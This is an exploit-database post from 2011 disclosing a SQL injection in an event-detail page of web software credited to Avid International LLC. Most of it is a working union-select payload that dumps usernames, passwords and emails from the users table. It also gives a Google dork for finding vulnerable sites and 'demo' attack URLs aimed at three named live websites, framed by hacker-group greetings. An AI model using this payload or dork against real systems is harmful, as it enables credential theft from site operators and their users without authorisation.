Avid International LLC<= SQL Injection Vulnerability



EKU-ID: 617 CVE: OSVDB-ID:
Author: Caddy-Dz Published: 2011-06-24 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
     \/      \/|__|                                          \/  
			Exploit-ID is the Exploit Information Disclosure
 
Web             : exploit-id.com	
e-mail          : root[at]exploit-id[dot]com             
 
            	   	 #########################################			  
		  	   I'm Caddy-Dz, member of Exploit-Id				
		  	 #########################################			  
======================================================================
####
# Exploit Title: Avid International LLC<= SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia@hotmail.com  |  Caddy-Dz@exploit-id.com
# Website: www.exploit-id.com
# Category:: webapps
# Google dork: intext:"powered by Avid International LLC"
# Tested on: [Windows Vista Edition Intégral- France]
####


[+] ExpLo!T:

http://127.0.0.1/detail_event.php?e_id=[SQLi]

[+] SQLi => +union+select+1,2,3,group_concat(u_username,0x3a,u_password,0x3a,u_emails,0x2f),5,6,7,8,9,10,11,12+from+users--

http://127.0.0.1/detail_event.php?e_id=-1+union+select+1,2,3,group_concat(u_username,0x3a,u_password,0x3a,u_emails,0x2f),5,6,7,8,9,10,11,12+from+users--


[+] Demo :

http://www.dwsactingstudio.com/detail_event.php?e_id=-1+union+select+1,2,3,group_concat(u_username,0x3a,u_password,0x3a,u_emails,0x2f),5,6,7,8,9,10,11,12+from+users--

http://www.deewallacestone.com/detail_event.php?e_id=-337+union+select+1,2,3,group_concat(u_username,0x3a,u_password,0x3a,u_emails,0x2f),5,6,7,8,9,10,11,12+from+users--

http://totoenterprises.com/detail_event.php?e_id=-337+union+select+1,2,3,group_concat(u_username,0x3a,u_password,0x3a,u_emails,0x2f),5,6,7,8,9,10,11,12+from+users--


####

[+] Peace From Algeria

####

=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T ,               |
  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (09exploit.com) ,                 |
  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
  RmZ ...others                                                                              |
============================================================================================ |